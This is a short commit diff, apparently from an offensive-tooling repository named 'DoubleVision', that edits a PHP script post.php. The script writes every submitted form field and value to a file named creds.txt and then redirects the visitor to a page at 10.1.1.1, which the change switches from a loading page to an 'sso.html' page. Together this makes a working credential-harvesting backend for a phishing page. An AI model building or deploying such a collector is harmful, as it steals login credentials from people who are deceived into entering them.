assume-breach 3 лет назад
Родитель
Сommit
2b088e9266
1 измененных файлов с 2 добавлено и 1 удалено
  1. 2 1
      DoubleVision/html/post.php

+ 2 - 1
DoubleVision/html/post.php

@@ -1,5 +1,5 @@
 <?php
-header ('Location:http://10.1.1.1/loading.html');
+header ('Location:http://10.1.1.1/sso.html');
 $handle = fopen("creds.txt", "a");
 foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
@@ -11,3 +11,4 @@ fwrite($handle, "\r\n");
 fclose($handle);
 exit;
 ?>
+